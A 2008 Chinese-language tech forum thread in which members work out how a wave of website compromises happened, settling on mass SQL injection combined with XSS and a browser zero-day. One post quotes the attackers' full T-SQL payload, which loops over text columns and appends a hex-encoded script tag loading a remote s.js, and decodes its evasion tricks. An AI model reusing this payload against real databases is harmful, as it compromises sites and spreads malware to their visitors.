注意自己的網頁是否也被入侵.... - PCDVD數位科技討論區

foxtm

Power Member

加入日期: Jan 2002

您的住址: 台北苦命IT工人

文章: 586

引用:

作者hakken

...這只是在文字串內塞入HTML tag的一種code injection，sql injection不是這樣！
sql injection不只是windows會有的！寫作不良的web application都會有這樣的危險。

小弟認為有八成的可能是 SQL Injection ..
因為由樓主提供的截圖看來..資料庫內已經被 update 過而塞入了 java script了 ..
所以每個家族名稱下面都出現重複性的 java script code ..

按照截圖判斷..似乎該討論區系統有檔的java script的樣子..所以還是看得到 code ..
(現在工作機是跑xp不敢去連

.. 回家換linux機器再連到該網站試試看..)
如果是有心人去留言版內重複貼code的話..
應該會在發現有擋住script的情況下停止貼的動作..所以我認為是已經洞悉資料庫欄位的 SQL Injection ..
而不是單純的貼文塞code的code injection..

另外以他蔓延的情況而言..
我認為是針對特定的留言版系統進行攻擊的..
設定程式去跑..抓到是特定留言版系統時就用SQL Injection塞code進去..

不過現階段是看圖說故事..一切都都還是小弟的猜測啦..
晚上回家換linux的機器在連過去看看..

2008-05-28, 04:31 PM #11

chk

Golden Member

加入日期: Apr 2001

您的住址: 雞窩

文章: 2,822

SQL Injection 的含意很廣吧..
不過這個看來是單純的在留言版的地方塞入script語法,不見得要用到SQL 語法
如果留言版沒有對內容做一些驗證或判斷,就會發生這種狀況
當然可以下SQL Injection 的話,結果就不只是網頁被塞script了...
搞不好DB都被砍了

__________________

燦坤卡號 36680441 歡迎取用
順發卡號 00149760 歡迎取用

[2015日本滋賀縣琵琶湖機車環湖之旅] [2016東京競馬初體驗]
[2017四國機車行] [2018紀伊半島機車行]
[2019 HONDA CROSS CUB山陰閒晃][2021 久違的重機開箱文-Z900RS]
[景點分享-台南東山咖啡-竹栱仔厝] [2022 重機小跑-環半島之旅]
[2023-名古屋-富士山之旅] [2024-北海道-道南之旅]

2008-05-28, 05:05 PM #13

Devil

Power Member

加入日期: Jan 2001

您的住址: Taipei

文章: 503

XSS Attack?SQL Injection?
小弟的看法是XSS Attack,SQL Injection的話,不會是只填入這些資料而已
直接將網站的整個DB Drop掉都可以
另SQL Injection or XSS Attack,都不僅限於Windows+IIS平台
大略說一下,XSS Attack是藉由輸入Script於網頁上,竊取瀏覽該網頁的使用者的Cookie資料
SQL Injection是利用SQL 語法攻擊網站後端的DB
各位可以上google參考一下XSS攻擊
有錯請指教

__________________

此文章於 2008-05-28 05:39 PM 被 Devil 編輯.

2008-05-28, 05:35 PM #14

foxtm

Power Member

加入日期: Jan 2002

您的住址: 台北苦命IT工人

文章: 586

引用:

作者Devil

XSS Attack?SQL Injection?
小弟的看法是XSS Attack,SQL Injection的話,不會是只填入這些資料而已
直接將網站的整個DB Drop掉都可以

因為他的目的是散撥 s.js 而不是搞垮網站..
所以填入這些字串就綽綽有餘了..把table drop掉只是導致網站癱瘓..
降低散播速度罷了

引用:

作者Devil

另SQL Injection or XSS Attack,都不僅限於Windows+IIS平台
大略說一下,XSS Attack是藉由輸入Script於網頁上,竊取瀏覽該網頁的使用者的Cookie資料
SQL Injection是利用SQL 語法攻擊網站後端的DB
各位可以上google參考一下XSS攻擊
有錯請指教

所以可能是 XSS Attack 混合 SQL Injection 攻擊 ..
利用 SQL Injection 將網站內容值入 java script 後..
使用者用瀏覽器瀏覽時執行該段 script 導致 XSS Attack ..
木馬藉此進入使用者電腦..並且於瀏覽器瀏覽其他網站時..會嘗試有無 SQL Injection 漏洞繼續散播..
因此發生前文 pkopko 兄提供的狀況..清掉後會一直復發..且內外網皆中標..
皆肇因於內部使用者中木馬了..卻沒有發現而如常的使用公司內外網站

當然啦

~~ 這還是看圖說故事

...
僅供參考..有錯歡迎用力吐草~~

此文章於 2008-05-28 06:34 PM 被 foxtm 編輯.

2008-05-28, 06:32 PM #16

foxtm

Power Member

加入日期: Jan 2002

您的住址: 台北苦命IT工人

文章: 586

引用:

作者野口隆史

這是針對iis的sql代碼注入攻擊
只發生在windows平台上，目前全世界已知被攻擊的網站已經超過50萬了

野口兄說對了..是 SQL Injection 沒錯..不愧是長期在關心相關資訊的高手

剛剛追蹤了 script 後.. 用一些關鍵字去查之後大致了解情況了..
是屬於 SQL Injection + XSS + 0day 混合攻擊型的..
(0day是指在安全補丁發佈前而被了解和掌握的漏洞資訊。)

SQL Injection 使用的 Code 如下..

引用:

作者SQL Injection Code

dEcLaRe @t vArChAr(255),@c vArChAr(255)
dEcLaRe tAbLe_cursoR cUrSoR FoR
exec(‘UpDaTe [’+@t+‘sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD

AnD a.xTyPe=‘u’ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0)
bEgIn
exec(‘UpDaTe [’+@t+‘] sEt [’+@c+‘]=rtrim(convert(varchar,[’+@c+‘]))+cAsT

(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3

C2F7363726970743E3C212D2D aS vArChAr(67))’)
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
eNd
cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR

攻擊者很細心的用了大小寫交錯避開一般程式中對Request的檢查..
對SQL Server資料庫裡面
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
四種資料型態進行 update ..
塞入的資料十六進位為
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3
轉換為字串即是"></title><script src=http://s.see9.us/s.js></script><!--
這裡再次展現攻擊者的細心 =_= .. 用十六進位代碼取代容易被抓到的 html script ..

因為主攻 sql server .. 所以看起來都是 IIS 中標.. 畢竟一般後台 DB 會用 sql server 的情況下..前台大都是 IIS + ASP (.NET) ..

接下來使用 XSS Attack 讓網站瀏覽者的瀏覽器執行攻擊者安排的 Java Script ..
用 0day 鑽漏洞取得網站瀏覽者本機一定的權限..之前的0day漏洞是抓 real play 的..
但只要攻擊者高興..只要替換 script 隨時可以用其他 0day 漏洞攻擊瀏覽者本機 ..

最後是攻擊者的目的..
應該是 "點廣告" .. 利用三重機制將木馬傳播出去之後 .. 幫攻擊者點網路****賺錢

..

小弟是參考綜合兩份大陸論壇資料做出的結論..
為免直接連接論壇的危險..所以提供兩份Google 文字快取供板友們參考 ..
http://72.14.235.104/search?q=cache...x&gl=tw&strip=1
http://72.14.235.104/search?q=cache...l=zh-TW&strip=1

僅供參考..有錯歡迎用力吐草~~

2008-05-29, 02:43 AM #17

foxtm

Power Member

加入日期: Jan 2002

您的住址: 台北苦命IT工人

文章: 586

其實點進野口兄的avpclub論壇
馬上就找到相關資訊了 ^^||| ..實在頗有白做功課之感覺..
http://www.avpclub.ddns.info/discuz...-10913-1-1.html

引用:

作者AVPClub網路安全論壇 STONE

台灣網站遭受有史以來最大規模SQL Injection 攻擊
新型態的Mass SQL Injection在台上演
內有詳細的攻擊說明
資料來源阿瑪科技
請參考以下網址:http://www.armorize.com.tw/news/shownews.php?news=22

可供板友們參考

2008-05-29, 03:03 AM #18

hakken Regular Member 加入日期: Sep 2002 您的住址: Earth 文章: 56	foxtm細心！真的受教了！！這是code injection, sql injection的組合沒錯！看圖說話果然膚淺，又受教了一次！！不過要是使用sql injection，就要猜到table的欄位名稱所以這應該是針對一些現成套裝(有很多是網路上取得免費的)系統的攻擊吧！此文章於 2008-05-29 03:25 AM 被 hakken 編輯.
2008-05-29, 03:17 AM #19

chk

Golden Member

加入日期: Apr 2001

您的住址: 雞窩

文章: 2,822

相關資訊在這裏
http://www.armorize.com.tw/news/shownews.php?news=22
今天又有新的資訊出來
http://www.armorize.com.tw/news/shownews.php?news=23

阿碼科技ASF™(Armorize Special Forces)資安團隊深入分析後，於05月20日通知媒體並發出新聞稿：

05202008 台灣網站遭受有史以來最大規模SQL Injection 攻擊--新型態的Mass SQL Injection在台上演

當時我們於新聞稿中指出，「推測犯罪集團在進行大規模網站佈局，等待下一個瀏覽器零時差攻擊(Zero Day Attack) 出現後大量收割。」

因為當時ASF™團隊在追蹤過程中已經發現，犯罪集團似乎故意不讓惡意連結發生實際效用，佈局的意味濃厚。

ASF™團隊於05月23日開始，發現駭客集團在其大規模SQL Injection攻擊中，開始採用攻擊Adobe Flash之網馬（malware），經深入分析，赫然發現此為Adobe Flash 之零時差攻擊（Zero Day Attack / 0day）！此次大規模攻擊，自01月開始至今未停，目前又出現搭配零時差攻擊手法，堪稱前所未有之嚴重大規模攻擊事件，故詳述如下。

[用戶端安全建議 ]

此次為零時差攻擊，故我們於05月20公布之[用戶端安全建議]無效。針對此次攻擊，我們建議暫時關閉Adobe Flash。雖然此舉會造成許多網站在瀏覽時之問題，然此為零時差攻擊，目前並無其他方法。IE使用者可自[工具]→管理附加工具，並停用"Shockwave Flash Object"。Firefox用戶可以利用regedt32.exe(regedit.exe)把 CLSID 之 d27cdb6e-ae6d-11cf-96b8-444553540000設成 1，以暫時停止Flash之運作。

__________________

2008-05-29, 08:33 AM #20

Devil Power Member 加入日期: Jan 2001 您的住址: Taipei 文章: 503	補充.XSS Attack 不必經由SQL Injection 例如,我現在在留言時,可以藉由插入一個圖片埋下一段java script了所以防制的方法可以是,Server端的程式判斷留言內容是否有不應該出現的字串 __________________
2008-05-28, 06:04 PM #15